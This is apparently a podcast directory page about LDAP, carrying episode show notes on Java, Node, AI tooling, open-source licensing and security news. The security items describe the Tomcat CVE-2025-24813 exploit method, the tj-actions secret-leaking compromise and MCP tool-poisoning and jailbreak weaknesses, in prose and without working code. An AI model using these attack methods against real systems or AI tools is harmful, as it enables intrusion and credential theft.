Podcasts about LDAP

Computer network protocol

  • 83 podcasts
  • 117 episodes
  • 42m average episode duration
  • 1 new episode per month
  • Latest episode: May 29, 2025

POPULARITY

[Chart: episode popularity by year, 2017-2024]


Best podcasts about LDAP

Latest podcast episodes about LDAP

2.5 Admins
2.5 Admins 249: Octopodian Nightmare

2.5 Admins

Play Episode Listen Later May 29, 2025 29:21


Locating people with just a phone call, Google forces a change to Let's Encrypt certificates, yet another example of a "lifetime" subscription being cut short, connecting drives to a small form factor machine, and managing SSH keys with LDAP.

Plugs: Support us on Patreon and get an ad-free RSS feed with early episodes sometimes […]
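As a taste of that last topic, here is a minimal, hypothetical Java sketch of the LDAP side: querying a directory for a user's public keys with the standard JNDI provider. It assumes the common but non-standard openssh-lpk schema, where keys live in an sshPublicKey attribute; the host, base DN, and uid are placeholders.

```java
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import java.util.Hashtable;

public class LdapSshKeys {
    public static void main(String[] args) throws Exception {
        // Connection settings are illustrative; adjust to your directory.
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://ldap.example.com:389");

        DirContext ctx = new InitialDirContext(env);
        try {
            // Fetch only the sshPublicKey attribute (openssh-lpk schema,
            // if your directory loads it) for the matching user entry.
            SearchControls controls = new SearchControls();
            controls.setSearchScope(SearchControls.SUBTREE_SCOPE);
            controls.setReturningAttributes(new String[] {"sshPublicKey"});

            NamingEnumeration<SearchResult> results = ctx.search(
                "ou=people,dc=example,dc=com", "(uid={0})",
                new Object[] {"alice"}, controls);

            while (results.hasMore()) {
                Attribute keys = results.next().getAttributes().get("sshPublicKey");
                if (keys == null) continue;
                for (int i = 0; i < keys.size(); i++) {
                    System.out.println(keys.get(i)); // one authorized_keys line per value
                }
            }
        } finally {
            ctx.close();
        }
    }
}
```

A typical deployment points sshd's AuthorizedKeysCommand at a small helper that runs the same query, so keys are centralized in the directory instead of scattered across ~/.ssh/authorized_keys files.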

Les Cast Codeurs Podcast
LCC 325 - Trier le hachis des concurrents

Les Cast Codeurs Podcast

Play Episode Listen Later May 9, 2025 109:42


A big episode covering a wide range of topics: Java, Scala, Micronaut, NodeJS, AI and developer skills, sampling in LLMs, DTOs, vibe coding, the changes at Broadcom and Red Hat, plus several news items on open source licenses. Recorded May 7, 2025. Download the episode at LesCastCodeurs-Episode-325.mp3 or watch it on YouTube.

News

Languages

For JavaOne and the launch of Java 24, Oracle has launched a new site with video resources for learning the language: https://learn.java/ The site is aimed mostly at beginners and teachers. It also covers syntax, including more recent additions such as records and pattern matching. It's not the trendiest site in the world.

Martin Odersky shares a long article on the state of the Scala ecosystem and the evolution of the language https://www.scala-lang.org/blog/2025/03/24/evolving-scala.html Stability and the need to evolve: Scala holds its position (roughly 14th worldwide) on solid technical foundations, but must evolve against the competition to stay relevant. Priority areas: evolution focuses on improving the safety/usability pairing, polishing the language (removing "rough edges"), and simplifying things for beginners. Continuous innovation: freezing features is ruled out; innovation is key to Scala's value, and the language must remain general-purpose rather than tying itself to a specific framework. Challenges and progress: tooling (IDEs, build tools such as sbt, scala-cli, Mill) and the learnability of the ecosystem are points of attention, with improvements underway (a teaching partnership, simpler platforms).

Even faster strings! https://inside.java/2025/05/01/strings-just-got-faster/ In JDK 25, the performance of String::hashCode has been improved to be mostly constant foldable. This means that if strings are used as keys in a static, immutable Map, significant performance gains are likely (see the sketch below). The improvement relies on the internal @Stable annotation applied to the private String.hash field. That annotation lets the virtual machine read the hash value once and treat it as a constant if it is not the default value (zero). As a result, a String::hashCode call can be replaced with the known hash value, optimizing lookups in immutable Maps. One edge case is a string whose hash code is zero, where the optimization does not work (for example, the empty string ""). Although @Stable is internal to the JDK, a new JEP (JEP 502: Stable Values (Preview)) is in the works to let users benefit indirectly from similar functionality.

AtomicHash, a Java implementation of a HashMap that is thread-safe, atomic, and non-blocking https://github.com/arxila/atomichash Implemented as an immutable version of a concurrent hash trie.
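To make the String::hashCode item above concrete, here is a small Java sketch of the pattern it describes: String keys in a static, immutable Map. The map contents are invented for illustration; the constant folding itself is JDK 25 JIT behavior, so the code needs nothing special.

```java
import java.util.Map;

public class ConstantFoldableLookup {

    // A static, immutable map with String keys. In JDK 25, String.hash is
    // annotated @Stable internally, so once computed it can be treated as a
    // constant by the JIT, letting lookups like the one below fold away.
    private static final Map<String, Integer> DEFAULT_PORTS = Map.of(
            "http", 80,
            "https", 443,
            "ldap", 389,
            "ldaps", 636);

    static int portFor(String scheme) {
        // When 'scheme' is a constant at the call site, the hash computation
        // (and potentially the whole lookup) can be folded by the JIT.
        return DEFAULT_PORTS.getOrDefault(scheme, -1);
    }

    public static void main(String[] args) {
        System.out.println(portFor("ldap")); // 389
        System.out.println(portFor("smtp")); // -1 (not in the map)
    }
}
```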
Libraries

Micronaut 4.8.0 released https://micronaut.io/2025/04/01/micronaut-framework-4-8-0-released/ BOM (Bill of Materials) update: version 4.8.0 updates the Micronaut platform BOM. Micronaut Core improvements: integration of Micronaut SourceGen for internal generation of metadata and bytecode expressions, plus numerous improvements in Micronaut SourceGen itself. Dependency-injection tracing added to ease debugging at startup and at bean creation. New definitionType member in the @Client annotation to simplify sharing interfaces between client and server. Merge support in Bean Mappers via the @Mapping annotation. New liveness probe that detects deadlocked threads via ThreadMXBean. Improved Kubernetes integration: the Kubernetes Java client is updated to 22.0.1, and a new Micronaut Kubernetes Client OpenAPI module offers an alternative to the official client with fewer dependencies, unified configuration, filter support, and Native Image compatibility. A new server runtime based on Java's built-in HTTP server lets you build applications without external server dependencies. Micronaut Micrometer gains a module to instrument data sources (traces and metrics), and a condition member in the @MetricOptions annotation gates metrics via an expression. Support for Consul watches in Micronaut Discovery Client to detect distributed-configuration changes. Source code can now be generated from a JSON schema via the build plugins (Gradle and Maven).

Web

Node v24.0.0 becomes the Current release: https://nodejs.org/en/blog/release/v24.0.0 V8 engine updated to 13.6: new JavaScript features such as Float16Array, explicit resource management (using), RegExp.escape, WebAssembly Memory64, and Error.isError. npm 11 included: improvements in performance, security, and compatibility with modern JavaScript packages. Compiler change on Windows: MSVC is dropped in favor of ClangCL for building Node.js on Windows. AsyncLocalStorage now uses AsyncContextFrame by default, for more efficient async context handling. URLPattern is available globally: no more explicit import needed for URL matching. Permission-model improvements: the experimental --experimental-permission flag becomes --permission, signaling increased stability of the feature. Test-runner improvements: subtests are now awaited automatically, simplifying test writing and reducing errors from unhandled promises. Undici 7 integrated: better HTTP client performance and broader support for modern HTTP features. Deprecations and removals: url.parse() deprecated in favor of the WHATWG URL API; tls.createSecurePair removed; SlowBuffer deprecated; instantiating REPL without new deprecated; using Zlib classes without new deprecated; passing args to spawn and execFile in child_process deprecated. Node.js 24 is currently the "Current" release and will become an LTS release in October 2025. Testing this version now to assess its impact on your applications is recommended.

Data and Artificial Intelligence

Learning to code remains crucial, and AI is there to help: https://kyrylo.org/software/2025/03/27/learn-to-code-ignore-ai-then-use-ai-to-code-even-better.html Learning to code remains essential despite AI. AI can assist with programming, but a solid foundation is crucial for understanding and controlling code, and it keeps you from becoming dependent on AI.
It also reduces the risk of being replaced by AI tools that are accessible to everyone. AI is a tool, not a substitute for mastering the fundamentals.

A great article from Anthropic that tries to understand how the "thinking" of LLMs works https://www.anthropic.com/research/tracing-thoughts-language-model Black-box effect: the internal strategies of AIs (Claude) are opaque to developers and users. Goal: understand the internal "reasoning" to verify capabilities and intentions. Method: inspired by neuroscience, they built an "AI microscope" (looking at which neural circuits activate). Technique: identifying concepts ("features") and internal "circuits". Multilingualism: evidence of a conceptual "language of thought" shared across languages before translating into a particular one. Planning: an ability to anticipate (e.g., rhymes in poetry), not just word-by-word (token-by-token) generation. Unfaithful reasoning: the model can fabricate plausible arguments ("bullshitting") to support a given conclusion. Multi-step logic: it combines distinct facts rather than merely memorizing. Hallucinations: refusal by default; it answers when "knowledge" activates, otherwise it risks hallucinating on error. "Jailbreaks": a tension between grammatical coherence (which pushes the model to continue) and safety (which should make it refuse). Bottom line: the methods are limited but promising for AI transparency and reliability.

The "S" in MCP stands for Security (or not!) https://elenacross7.medium.com/%EF%B8%8F-the-s-in-mcp-stands-for-security-91407b33ed6b The MCP specification, which gives LLMs access to various tools and functions, may have been adopted a bit too quickly, before it was ready on the security front. The article lists four possible attack types: command-injection vulnerabilities; tool-poisoning attacks; silent tool redefinition; and cross-server tool shadowing. For now, MCP is not secure: no authentication standard, no context encryption, no tool-integrity verification. Based on the InvariantLabs article https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks

Infinispan 15.2 released - pre rolling upgrades for 16.0 https://infinispan.org/blog/2025/03/27/infinispan-15-2 Redis JSON + Lua script support. JVM metrics can be disabled. New console (PatternFly 6). Improved docs (metrics + logs). JDK 17 minimum, JDK 24 supported. End of the native server (for performance reasons).

Guillaume shows how to build an MCP HTTP Server-Sent Events server with the Java reference implementation and LangChain4j https://glaforge.dev/posts/2025/04/04/mcp-client-and-server-with-java-mcp-sdk-and-langchain4j/ Built in Java, with the reference implementation that also underpins the Spring Boot implementation (but is independent of Spring). The MCP server is exposed as a servlet in Jetty. The MCP client is built with LangChain4j's MCP module. It is semi-independent of Spring in the sense that it depends on Reactor and its interfaces. There is a conversation on Anthropic's GitHub to find a solution, but it does not look simple.

The fallacies behind the quote "AI won't replace you, but humans using AI will" https://platforms.substack.com/cp/161356485 The automation vs. augmentation fallacy: it focuses on improving existing tasks with AI instead of considering how the value of those tasks changes in a new system. The productivity-gains fallacy: higher productivity does not always translate into more value for workers, because the value created can be captured elsewhere in the system. The static-jobs fallacy: jobs are organizational constructs that AI can redefine, making traditional roles obsolete. The "me vs. someone using AI" competition fallacy: competition shifts when AI changes a sector's fundamental constraints, making existing skills less relevant. The workflow-continuity fallacy: AI can drive a complete reimagining of workflows, eliminating the need for certain skills. The neutral-tools fallacy: AI tools are not neutral and can redistribute organizational power by changing how decisions are made and executed. The stable-salary fallacy: keeping a job does not guarantee a stable salary, because the value of the work can fall as AI capabilities grow. The stable-company fallacy: integrating AI requires restructuring the company and does not happen in an organizational vacuum.

Understanding "sampling" in LLMs https://rentry.co/samplers Explains why LLMs use tokens; the different "sampling" methods, i.e., how tokens are chosen; hyperparameters such as temperature and top-p and how they interact; and tokenization algorithms such as Byte Pair Encoding and SentencePiece (see the sketch below).
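Alongside that explainer, here is a minimal, self-contained Java sketch (toy numbers, not from the article) of two of the samplers it covers: temperature scaling of logits followed by top-p (nucleus) sampling. Real inference stacks apply the same idea over tens of thousands of logits.

```java
import java.util.*;

public class Sampling {
    // Softmax with temperature: lower T sharpens the distribution, higher T flattens it.
    static double[] softmax(double[] logits, double temperature) {
        double[] p = new double[logits.length];
        double max = Arrays.stream(logits).max().orElse(0), sum = 0;
        for (int i = 0; i < logits.length; i++) {
            p[i] = Math.exp((logits[i] - max) / temperature);
            sum += p[i];
        }
        for (int i = 0; i < p.length; i++) p[i] /= sum;
        return p;
    }

    // Top-p: keep the smallest set of tokens whose cumulative mass reaches p,
    // then sample proportionally within that nucleus.
    static int sampleTopP(double[] probs, double topP, Random rng) {
        Integer[] idx = new Integer[probs.length];
        for (int i = 0; i < probs.length; i++) idx[i] = i;
        Arrays.sort(idx, (a, b) -> Double.compare(probs[b], probs[a])); // descending

        List<Integer> nucleus = new ArrayList<>();
        double cum = 0;
        for (int i : idx) {
            nucleus.add(i);
            cum += probs[i];
            if (cum >= topP) break;
        }

        double r = rng.nextDouble() * cum; // renormalize by sampling within kept mass
        for (int i : nucleus) {
            r -= probs[i];
            if (r <= 0) return i;
        }
        return nucleus.get(nucleus.size() - 1);
    }

    public static void main(String[] args) {
        double[] logits = {2.0, 1.0, 0.5, -1.0};   // toy vocabulary of 4 tokens
        double[] probs = softmax(logits, 0.8);      // temperature = 0.8
        int token = sampleTopP(probs, 0.9, new Random());
        System.out.println("sampled token id: " + token);
    }
}
```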
One fewer player... OpenAI is set to buy Windsurf for 3 billion dollars https://www.bloomberg.com/news/articles/2025-05-06/openai-reaches-agreement-to-buy-startup-windsurf-for-3-billion The deal is not yet finalized. Windsurf was valued at 1.25 billion last year, and OpenAI recently raised 40 billion, bringing its valuation to 300 billion. The goal for OpenAI is to enter the code-assistant market, where it is absent today.

Docker Desktop gets into AI...? A new feature in Docker Desktop 4.4 on macOS: Docker Model Runner https://dev.to/docker/run-genai-models-locally-with-docker-model-runner-5elb It lets you run models natively and locally (https://docs.docker.com/model-runner/) but also MCP servers (https://docs.docker.com/ai/mcp-catalog-and-toolkit/).

Tooling

JetBrains defends removing negative reviews of its AI assistant https://devclass.com/2025/04/30/jetbrains-defends-removal-of-negative-reviews-for-unpopular-ai-assistant/?td=rt-3a JetBrains' AI Assistant, launched in July 2023, has been downloaded more than 22 million times but is rated only 2.3 out of 5. Users noticed that some negative reviews were being deleted, which triggered a backlash on social media. A JetBrains employee explained that reviews were removed either because they mentioned problems that had already been fixed or because they violated the policy on "profanity, etc." The company acknowledged it could have handled the situation better, with a representative stating: "Removing multiple reviews at once without prior notice looked suspicious. We should have at least posted a notice and provided more details to the authors." Problems users report with the AI Assistant include limited support for third-party model providers, noticeable latency, frequent slowdowns, core features locked to JetBrains' cloud services, an inconsistent user experience, and insufficient documentation. A common complaint is that the AI Assistant installs itself without permission. One Reddit user called it an "annoying plugin that self-heals/reinstalls itself like a phoenix". JetBrains recently introduced a free tier and a new AI agent called Junie, meant to run alongside the AI Assistant, probably in response to competition among vendors. But it is more expensive to run. The company has committed to exploring new approaches for handling major updates differently and is considering per-version reviews, or marking reviews as "Resolved" with links to the corresponding issues instead of deleting them. Unlike competitors such as Microsoft, AWS, or Google, JetBrains sells only developer tools and services and has no separate cloud business to fall back on.

Make the images in your READMEs and Markdown files work with GitHub's dark mode: https://github.blog/developer-skills/github/how-to-make-your-images-in-markdown-on-github-adjust-for-dark-mode-and-light-mode/ Only a few lines of pure HTML are needed.

Architecture

So, DTOs: good or bad? https://codeopinion.com/dtos-mapping-the-good-the-bad-and-the-excessive/ What DTOs are for: DTOs transfer data between the layers of an application, often mapping data between different representations (for example, between the database and the user interface). Frequent overuse: the article notes that DTOs are often overused, notably to build HTTP APIs that merely mirror database entities, missing the opportunity to compose richer data. Real value: the real value of DTOs lies in managing coupling between layers and composing data from multiple sources into shapes optimized for specific use cases (see the sketch below). Decoupling: DTOs are best used to decouple internal data models from external contracts (such as APIs), allowing independent evolution and versioning. Example with CQRS: in CQRS (Command Query Responsibility Segregation), query responses act as DTOs specifically tailored to UI needs, possibly including data from multiple sources. Protecting internal data: DTOs help distinguish and protect internal (private) data models from external (public) changes. Avoiding excess: the author warns against excessive mapping layers (mapping one DTO to another DTO) that add no value. Targeted creation: create DTOs only when they solve concrete problems, such as managing coupling or enabling data composition.
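As a small illustration of the article's composition point (all names here are invented), a query-side DTO can assemble a UI-facing shape from more than one source instead of mirroring an entity field for field:

```java
import java.time.Instant;
import java.util.List;

// Internal persistence model: private to the service, free to evolve.
record OrderEntity(long id, long customerId, List<Long> itemIds, Instant createdAt) {}

// Hypothetical second data source the DTO composes from.
interface CustomerDirectory { String nameOf(long customerId); }

// Query-side DTO: the external contract, shaped for one screen rather than
// mirroring the entity one-to-one.
record OrderSummaryDto(long orderId, String customerName, int itemCount, Instant placedAt) {}

class OrderQueryService {
    private final CustomerDirectory customers;

    OrderQueryService(CustomerDirectory customers) { this.customers = customers; }

    OrderSummaryDto toSummary(OrderEntity order) {
        return new OrderSummaryDto(
                order.id(),
                customers.nameOf(order.customerId()), // data composed from a second source
                order.itemIds().size(),               // derived value, not a raw column
                order.createdAt());
    }
}
```

The DTO is the public contract: the entity can gain or rename fields without breaking API consumers, which is the decoupling benefit the article describes.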
Methodologies

Even Guillaume is trying "vibe coding" https://glaforge.dev/posts/2025/05/02/vibe-coding-an-mcp-server-with-micronaut-and-gemini/ According to Andrej Karpathy, it means POC-ing a prototype, a throwaway weekend app https://x.com/karpathy/status/1886192184808149383 But Simon Willison objects that some people confuse AI-assisted coding with vibe coding https://simonwillison.net/2025/May/1/not-vibe-coding/ Guillaume had fun here building an MCP server with Micronaut, using Gemini, Google's AI. Unlike Quarkus or Spring Boot, Micronaut does not yet have a module or specific support to ease the creation of MCP servers.

Security

A 10/10 security flaw in Tomcat https://www.it-connect.fr/apache-tomcat-cette-faille-activement-exploitee-seulement-30-heures-apres-sa-divulgation-patchez/ A critical vulnerability (CVE-2025-24813) affects Apache Tomcat, allowing remote code execution. It was actively exploited only 30 hours after its disclosure on March 10, 2025. The attack requires no authentication and is particularly simple to execute. It uses a PUT request with a base64-encoded serialized Java payload, followed by a GET request. The base64 encoding bypasses most security filters. Vulnerable servers use file-based session storage (a widespread configuration). Affected versions: 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98. Recommended updates: 11.0.3+, 10.1.35+, and 9.0.99+. Experts expect more sophisticated attacks in the next phases of exploitation (config or JSP uploads).

Hardening an SSH server https://ittavern.com/ssh-server-hardening/ An article listing the key settings for securing an SSH server: for example, disabling password authentication, changing the port, disabling root login, and forcing SSH protocol 2, plus some I didn't know, such as MaxStartups, which limits the number of concurrent unauthenticated connections. Port knocking is a useful technique, but it requires a protocol-aware approach on the client side.
Oracle admits that its customers' IAM identities leaked https://www.theregister.com/2025/04/08/oracle_cloud_compromised/ Oracle has confirmed to some customers that its public cloud was compromised, after previously denying any intrusion. A hacker claimed to have breached two Oracle authentication servers and stolen about six million records, including private security keys, encrypted credentials, and LDAP entries. The exploited flaw is said to be CVE-2021-35587 in Oracle Access Manager, which Oracle had not patched on its own systems. In early March, the attacker created a text file on login.us2.oraclecloud.com containing their email address to prove access. According to Oracle, an old server holding eight-year-old data was compromised, but one customer says login data as recent as 2024 was stolen. Oracle faces a lawsuit in Texas over this data breach. The intrusion is distinct from another attack against Oracle Health, on which the company declines to comment. Oracle could face penalties under the EU's GDPR, which requires notifying affected parties within 72 hours of discovering a data leak. Oracle's pattern of denying and then quietly admitting the intrusion is unusual in 2025 and could lead to further class actions.

A very popular GitHub Action compromised https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised Compromise of tj-actions/changed-files: in March 2025, a widely used GitHub Action (tj-actions/changed-files) was compromised, and modified versions of the action exposed CI/CD secrets in build logs. Attack method: a compromised PAT allowed several version tags to be redirected to a commit containing malicious code. Malicious code details: the injected code ran a base64-encoded Node.js function that downloaded a Python script. The script scanned the GitHub runner's memory for secrets (tokens, keys, and so on) and exposed them in the logs; in some cases the data was also sent out via a network request. Exposure window: the compromised versions were live between March 12 and 15, 2025. Any repository, particularly public ones, that used the action during this period should be considered potentially exposed. Detection: the malicious activity was spotted by analyzing unusual behavior during workflow runs, such as unexpected network connections. Response: GitHub removed the compromised action, which was subsequently cleaned up. Potential impact: any secrets that appeared in logs must be considered compromised, even in private repositories, and regenerated without delay.

Law, society, and organization

Y Combinator startups are growing faster than at any point in the fund's history https://www.cnbc.com/2025/03/15/y-combinator-startups-are-fastest-growing-in-fund-history-because-of-ai.html Early-stage Silicon Valley startups are seeing significant growth thanks to artificial intelligence. Y Combinator CEO Garry Tan says the latest cohort as a whole grew 10% week over week for nine months. AI lets developers automate repetitive tasks and generate code with large language models. For about 25% of current YC startups, 95% of their code was written by AI. This shift lets companies grow with fewer staff, some reaching 10 million dollars in revenue with fewer than 10 employees. The "growth at all costs" mentality has been replaced by renewed interest in profitability. About 80% of the companies presented at demo day were AI-focused, with a few robotics and semiconductor startups. Y Combinator invests 500,000 dollars in startups in exchange for equity, followed by a three-month program.
Red Hat middleware (ex-JBoss) joins IBM https://markclittle.blogspot.com/2025/03/red-hat-middleware-moving-to-ibm.html Red Hat's middleware activities (including JBoss, Quarkus, etc.) are being transferred to IBM, into the unit dedicated to data security, IAM, and runtimes. The move follows Red Hat's strategic decision to focus more on hybrid cloud and artificial intelligence. Mark Little explains that the transfer had become inevitable, as Red Hat had reduced its middleware investments in recent years. The integration aims to strengthen Java innovation by uniting Red Hat's and IBM's efforts. The middleware products will remain open source, and customers will keep their usual support unchanged. Mark Little says projects such as Quarkus will continue to be supported and that this evolution is good for the Java community.

One year of Commonhaus https://www.commonhaus.org/activity/253.html One year in, having started with the communities they knew well, they now host 14 projects and can accept more. Their principles: trust, lightweight governance, and protecting the future of projects; automating administrative work; stability without complexity; developers at the center of decision-making. They need members and (financial) supporters, and they want to welcome projects beyond the circle of Java Champions.

Spring Cloud Data Flow becomes a commercial product and will no longer be maintained as open source https://spring.io/blog/2025/04/21/spring-cloud-data-flow-commercial Perhaps under Broadcom's influence, Spring is moving parts of the Spring portfolio to a proprietary model. They say few people used it in its OSS form and most usage came through the Tanzu platform, and that maintaining it as open source costs them time they would rather not spend on these projects.

The CNCF protects the NATS project, in the foundation since 2018, after Synadia, the company contributing to it, sought to take back control https://www.cncf.io/blog/2025/04/24/protecting-nats-and-the-integrity-of-open-source-cncfs-commitment-to-the-community/ CNCF: protects open source projects with neutral governance. Synadia vs CNCF: Synadia wanted to pull NATS out and relicense it under a non-open-source license (BUSL). The CNCF accuses Synadia of an illegitimate "claw back". Synadia's claims: the nats.io domain and the GitHub organization. NATS trademark: Synadia never transferred it (a broken promise, despite CNCF's help). Synadia's counterargument: the CNCF's rules are "too vague". Internal vote: Synadia's maintainers voted to leave the CNCF (without the community). CNCF support: major investment (funding, audits, legal) and community success (more than 700 organizations). NATS's future, per the CNCF: staying under Apache 2.0 with open governance. CNCF actions: a health check, a call for maintainers, cancellation of Synadia's trademark application, and rejection of its demands. But a good outcome seems to have emerged in the end: https://www.cncf.io/announcements/2025/05/01/cncf-and-synadia-align-on-securing-the-future-of-the-nats-io-project/ Agreement on the future of NATS.io: the Cloud Native Computing Foundation (CNCF) and Synadia reached an agreement to secure the future of the NATS.io project. Trademark transfer: Synadia will hand over its two NATS trademark registrations to the Linux Foundation to strengthen the project's open governance. Staying in the CNCF: the NATS project's infrastructure and assets remain under the CNCF, guaranteeing long-term stability and continued open source development under the Apache-2.0 license. Recognition and commitment: the Linux Foundation, through Todd Moore, recognizes Synadia's contributions and continued support. Derek Collison, Synadia's CEO, reaffirms his company's commitment to NATS and to collaborating with the Linux Foundation and the CNCF. Adoption and community support: NATS is widely adopted, considered critical infrastructure, and enjoys strong community support for its open source nature and Synadia's continued involvement.
Finally, Redis returns to an OSI-approved open source license, the AGPL https://foojay.io/today/redis-is-now-available-under-the-agplv3-open-source-license/ Redis moves to the AGPLv3 open source license to counter exploitation by cloud providers that do not contribute back. The earlier switch to the SSPL license had hurt the relationship with the open source community. Salvatore Sanfilippo (antirez) has returned to Redis. Redis 8 adopts the AGPL, integrates the Redis Stack features (JSON, Time Series, etc.), and introduces "vector sets" (the vector-computation support developed by Salvatore). These changes aim to strengthen Redis as a platform developers love, in line with Salvatore's original vision.

Conferences

The list of conferences, from the Developers Conferences Agenda/List by Aurélie Vache and contributors:

May 6-7, 2025: GOSIM AI Paris - Paris (France)
May 7-9, 2025: Devoxx UK - London (UK)
May 15, 2025: Cloud Toulouse - Toulouse (France)
May 16, 2025: AFUP Day 2025 Lille - Lille (France)
May 16, 2025: AFUP Day 2025 Lyon - Lyon (France)
May 16, 2025: AFUP Day 2025 Poitiers - Poitiers (France)
May 22-23, 2025: Flupa UX Days 2025 - Paris (France)
May 24, 2025: Polycloud - Montpellier (France)
May 24, 2025: NG Baguette Conf 2025 - Nantes (France)
June 3, 2025: TechReady - Nantes (France)
June 5-6, 2025: AlpesCraft - Grenoble (France)
June 5-6, 2025: Devquest 2025 - Niort (France)
June 10-11, 2025: Modern Workplace Conference Paris 2025 - Paris (France)
June 11-13, 2025: Devoxx Poland - Krakow (Poland)
June 12, 2025: Positive Design Days - Strasbourg (France)
June 12-13, 2025: Agile Tour Toulouse - Toulouse (France)
June 12-13, 2025: DevLille - Lille (France)
June 13, 2025: Tech F'Est 2025 - Nancy (France)
June 17, 2025: Mobilis In Mobile - Nantes (France)
June 19-21, 2025: Drupal Barcamp Perpignan 2025 - Perpignan (France)
June 24, 2025: WAX 2025 - Aix-en-Provence (France)
June 25-26, 2025: Agi'Lille 2025 - Lille (France)
June 25-27, 2025: BreizhCamp 2025 - Rennes (France)
June 26-27, 2025: Sunny Tech - Montpellier (France)
July 1-4, 2025: Open edX Conference - 2025 - Palaiseau (France)
July 7-9, 2025: Riviera DEV 2025 - Sophia Antipolis (France)
September 5, 2025: JUG Summer Camp 2025 - La Rochelle (France)
September 12, 2025: Agile Pays Basque 2025 - Bidart (France)
September 18-19, 2025: API Platform Conference - Lille (France) & Online
September 23, 2025: OWASP AppSec France 2025 - Paris (France)
September 25-26, 2025: Paris Web 2025 - Paris (France)
October 2-3, 2025: Volcamp - Clermont-Ferrand (France)
October 3, 2025: DevFest Perros-Guirec 2025 - Perros-Guirec (France)
October 6-10, 2025: Devoxx Belgium - Antwerp (Belgium)
October 7, 2025: BSides Mulhouse - Mulhouse (France)
October 9-10, 2025: Forum PHP 2025 - Marne-la-Vallée (France)
October 9-10, 2025: EuroRust 2025 - Paris (France)
October 16, 2025: PlatformCon25 Live Day Paris - Paris (France)
October 16-17, 2025: DevFest Nantes - Nantes (France)
October 30-31, 2025: Agile Tour Bordeaux 2025 - Bordeaux (France)
October 30-31, 2025: Agile Tour Nantais 2025 - Nantes (France)
October 30-November 2, 2025: PyConFR 2025 - Lyon (France)
November 4-7, 2025: NewCrafts 2025 - Paris (France)
November 6, 2025: dotAI 2025 - Paris (France)
November 7, 2025: BDX I/O - Bordeaux (France)
November 12-14, 2025: Devoxx Morocco - Marrakech (Morocco)
November 13, 2025: DevFest Toulouse - Toulouse (France)
November 15-16, 2025: Capitole du Libre - Toulouse (France)
November 20, 2025: OVHcloud Summit - Paris (France)
November 21, 2025: DevFest Paris 2025 - Paris (France)
November 27, 2025: Devfest Strasbourg 2025 - Strasbourg (France)
November 28, 2025: DevFest Lyon - Lyon (France)
December 5, 2025: DevFest Dijon 2025 - Dijon (France)
December 10-11, 2025: Devops REX - Paris (France)
December 10-11, 2025: Open Source Experience - Paris (France)
January 28-31, 2026: SnowCamp 2026 - Grenoble (France)
February 2-6, 2026: Web Days Convention - Aix-en-Provence (France)
April 23-25, 2026: Devoxx Greece - Athens (Greece)
June 17, 2026: Devoxx Poland - Krakow (Poland)

Contact us

To react to this episode, come discuss it on the Google group https://groups.google.com/group/lescastcodeurs Contact us via X/Twitter https://twitter.com/lescastcodeurs or Bluesky https://bsky.app/profile/lescastcodeurs.com Send us a crowdcast or a crowdquestion. Support Les Cast Codeurs on Patreon https://www.patreon.com/LesCastCodeurs All episodes and all the info at https://lescastcodeurs.com/

Cyber Bites
Cyber Bites - 11th April 2025

Cyber Bites

Play Episode Listen Later Apr 10, 2025 7:45


* Cyber Attacks Target Multiple Australian Super Funds, Half Million Dollars Stolen
* Intelligence Agencies Warn of "Fast Flux" Threat to National Security
* SpotBugs Token Theft Revealed as Origin of Multi-Stage GitHub Supply Chain Attack
* ASIC Secures Court Orders to Shut Down 95 "Hydra-Like" Scam Companies
* Oracle Acknowledges "Legacy Environment" Breach After Weeks of Denial

Cyber Attacks Target Multiple Australian Super Funds, Half Million Dollars Stolen
https://www.itnews.com.au/news/aussie-super-funds-targeted-by-fraudsters-using-stolen-creds-616269
https://www.abc.net.au/news/2025-04-04/superannuation-cyber-attack-rest-afsa/105137820

Multiple Australian superannuation funds have been hit by a wave of cyber attacks, with AustralianSuper confirming that four members have lost a combined $500,000 in retirement savings. The nation's largest retirement fund has reportedly faced approximately 600 attempted cyber attacks in the past month alone.

AustralianSuper has now confirmed that "up to 600" of its members were impacted by the incident. Chief member officer Rose Kerlin stated, "This week we identified that cyber criminals may have used up to 600 members' stolen passwords to log into their accounts in attempts to commit fraud." The fund has taken "immediate action to lock these accounts" and notify affected members.

Rest Super has also been impacted, with CEO Vicki Doyle confirming that "less than one percent" of its members were affected—equivalent to fewer than 20,000 accounts based on recent membership reports. Rest detected "unauthorised activity" on its member access portal "over the weekend of 29-30 March" and "responded immediately by shutting down the member access portal, undertaking investigations and launching our cyber security incident response protocols."

While Rest stated that no member funds were transferred out of accounts, "limited personal information" was likely accessed. "We are in the process of contacting impacted members to work through what this means for them and provide support," Doyle said.

HostPlus has confirmed it is "actively investigating the situation" but stated that "no HostPlus member losses have occurred" so far. Several other funds, including Insignia and Australian Retirement, were also reportedly affected.

Members across multiple funds have reported difficulty accessing their accounts online, with some logging in to find alarming $0 balances displayed. The disruption has caused considerable anxiety among account holders.

National cyber security coordinator Lieutenant General Michelle McGuinness confirmed that "cyber criminals are targeting individual account holders of a number of superannuation funds" and is coordinating with government agencies and industry stakeholders in response. The Australian Prudential Regulation Authority (APRA) and the Australian Securities and Investments Commission (ASIC) are engaging with all potentially impacted funds.

AustralianSuper urged members to log into their accounts "to check that their bank account and contact details are correct and make sure they have a strong and unique password that is not used for other sites." The fund also noted it has been working with "the Australian Signals Directorate, the National Office of Cyber Security, regulators and other authorities" since detecting the unauthorised access.

If you're a member of any of those funds, watch for official communications and be wary of potential phishing attempts that may exploit the situation.
Intelligence Agencies Warn of "Fast Flux" Threat to National Security
https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/fast-flux-national-security-threat

Multiple intelligence agencies have issued a joint cybersecurity advisory warning organizations about a significant defensive gap in many networks against a technique known as "fast flux." The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), FBI, Australian Signals Directorate, Canadian Centre for Cyber Security, and New Zealand National Cyber Security Centre have collaborated to raise awareness about this growing threat.

